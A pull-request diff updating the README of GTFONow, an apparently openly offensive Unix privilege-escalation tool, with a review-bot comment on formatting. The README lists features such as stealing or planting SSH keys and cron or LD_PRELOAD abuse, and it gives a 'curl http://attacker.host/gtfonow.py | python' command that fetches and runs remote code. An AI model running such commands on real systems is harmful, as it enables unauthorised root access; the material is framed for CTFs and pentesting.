Merge pull request #17 from Frissi0n/dev
docs: Update README
Showing 2 changed files with 32 additions and 72 deletions.
@@ -1,102 +1,62 @@ | ||
# GTFONow | ||
[![Main Branch](https://github.com/Frissi0n/GTFONow/actions/workflows/docker-pytest.yml/badge.svg?branch=main)](https://github.com/Frissi0n/GTFONow/actions/workflows/docker-pytest.yml) | ||
|
||
Automatic privilege escalation for misconfigured capabilities, sudo config and setuid/setguid binaries. | ||
# GTFONow | ||
|
||
## Features | ||
Automatic privilege escalation on unix systems by exploiting misconfigured setuid/setgid binaries, capabilities and sudo permissions. Designed for CTFs but also applicable in real world pentests. | ||
|
||
| Feature | Implemented | | ||
| -------------------------------------------------------------------------------------- | ------------------ | | ||
| Automatically exploit misconfigured sudo permissions. | :heavy_check_mark: | | ||
| Automatically exploit misconfigured suid, sgid permissions. | :heavy_check_mark: | | ||
| Automatically exploit misconfigured capabilities. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file read primitive into shell by stealing SSH keys. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file write primitive into shell by dropping SSH keys. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file write primitive into shell by writing to cron. | :heavy_check_mark: | | ||
| Automatically convert arbitrary file write primitive into shell using LD_PRELOAD. | :heavy_check_mark: | | ||
| Single file, easy to run fileless with `curl http://attackerhost/gtfonow.py \| python` | :heavy_check_mark: | | ||
| Interactionless mode. For environments where stdin is not controllable. | Todo | | ||
[![asciicast](https://asciinema.org/a/625026.svg)](https://asciinema.org/a/625026) | ||
|
||
## Compatibility | ||
## ✅ Features | ||
|
||
By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed. | ||
- Automatically exploit misconfigured sudo permissions. | ||
- Automatically exploit misconfigured suid, sgid permissions. | ||
- Automatically exploit misconfigured capabilities. | ||
- Automatically convert arbitrary file read primitive into shell by stealing SSH keys. | ||
- Automatically convert arbitrary file write primitive into shell by dropping SSH keys. | ||
- Automatically convert arbitrary file write primitive into shell by writing to cron. | ||
- Automatically convert arbitrary file write primitive into shell using LD_PRELOAD. | ||
- Single file, easy to run fileless with `curl http://attackerhost/gtfonow.py | python` | ||
|
||
| Platform | Supports | | ||
| -------------------------------------- | ------------------ | | ||
| Python2.\* | :heavy_check_mark: | | ||
| Python3.\* | :heavy_check_mark: | | ||
| No 3rd party dependencies | :heavy_check_mark: | | ||
| Any Unix Variant (Linux, MacOS,\*Nix) | :heavy_check_mark: | | ||
| Any architecture eg (X86/ARM64/X86-64) | :heavy_check_mark: | | ||
| Systems without Python installed | Todo | | ||
|
||
## Usage | ||
# 💻 Usage | ||
|
||
To use `GTFONow`, simply run the script from your command line. The basic syntax is as follows: | ||
|
||
```bash | ||
python gtfo_now.py [OPTIONS] | ||
```shell | ||
python gtfonow.py [OPTIONS] | ||
``` | ||
|
||
It can also be run by piping the out put of curl: | ||
It can also be run by piping the output of curl: | ||
|
||
```bash | ||
```shell | ||
curl http://attacker.host/gtfonow.py | python | ||
``` | ||
|
||
### Options | ||
|
||
Here are the options you can use with `GTFONow`: | ||
## Options | ||
|
||
- `--level`: Sets the level of checks to perform. You can choose between: | ||
|
||
- `1` (default) for a quick scan. | ||
- `2` for a more thorough scan. | ||
- Example: `python gtfonow.py --level 2` | ||
|
||
- `--risk`: Specifies the risk level of the exploit to perform. The options are: | ||
|
||
- `1` (default) for safe operations. | ||
- `2` for more aggressive operations, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing. | ||
- `2` for more aggressive operations such as file modifications, primarily for use in CTFs, if using on real engagements, ensure you understand what this is doing. | ||
- Example: `python gtfonow.py --risk 2` | ||
|
||
- `--sudo_password`: Enables sudo_password mode, offering more privilege escalation options if you know the sudo password. | ||
|
||
- This option does not require a value. You will be prompted to enter the sudo password via stdin. | ||
- Example: `python gtfonow.py --sudo_password` | ||
|
||
- `--command`: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes. | ||
|
||
- Example: `python gtfonow.py --command 'ls -la'` | ||
|
||
- `--auto`: Automatically exploits without user wizard. | ||
- `-v`, `--verbose`: Enables verbose output. | ||
- Example: `python gtfonow.py --verbose` | ||
|
||
### Examples | ||
|
||
Here are some example commands to get you started: | ||
|
||
1. Perform a quick scan: | ||
|
||
python gtfonow.py | ||
|
||
2. Perform a thorough scan with a higher risk level: | ||
|
||
python gtfonow.py --level 2 --risk 2 | ||
|
||
## Usage Examples | ||
|
||
### Default Mode - Scan All | ||
|
||
[![asciicast](https://asciinema.org/a/CyEH3GyAFyWtIVjngWpa0hDBk.svg)](https://asciinema.org/a/CyEH3GyAFyWtIVjngWpa0hDBk) | ||
|
||
### Capability Escalation | ||
|
||
[![asciicast](https://asciinema.org/a/nmrMirrKNRrb7XHhVRYD66tWa.svg)](https://asciinema.org/a/nmrMirrKNRrb7XHhVRYD66tWa) | ||
## Compatibility | ||
|
||
### Sudo Escalation and Verbose Mode | ||
By design GTFONow is a backwards compatible, stdlib only python script, meaning it should work on any variant of Unix if Python is installed. | ||
|
||
[![asciicast](https://asciinema.org/a/HdpWGxGAIAMahoJD6eoB6pqNq.svg)](https://asciinema.org/a/HdpWGxGAIAMahoJD6eoB6pqNq) | ||
- Python2.\* | ||
- Python3.\* | ||
- No 3rd party dependencies | ||
- Any Unix Variant (Linux, MacOS,\*Nix) | ||
- Any architecture eg (X86/ARM64/X86-64) | ||
|
||
## Credits | ||
## 🙏 Credits | ||
|
||
- Payloads thanks to [GTFOBins](https://gtfobins.github.io/). |
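Review bot: the heading levels in the rewritten README are inconsistent: `## Usage` becomes `# 💻 Usage` (an H1, the same level as the `# GTFONow` title) while `## ✅ Features`, `## Compatibility` and `## 🙏 Credits` stay at H2, and `### Options` is promoted to `## Options`, so the rendered outline splits the document at Usage; use `## 💻 Usage` and keep Options as a `### Options` subsection beneath it. Two roadmap rows from the old feature and compatibility tables, "Interactionless mode. For environments where stdin is not controllable." and "Systems without Python installed", are dropped entirely rather than carried over as bullets, so a reader of the new README can no longer tell that these are planned but unimplemented; if they are still planned, keep them in the list marked as Todo, and if they are abandoned, say so in the commit message. Minor: the old `### Examples` section (the `python gtfonow.py` and `python gtfonow.py --level 2 --risk 2` commands) is removed without an equivalent, and the `--auto` option is the only option left without an example line, which is worth a one-line `- Example: python gtfonow.py --auto` for consistency with the other options.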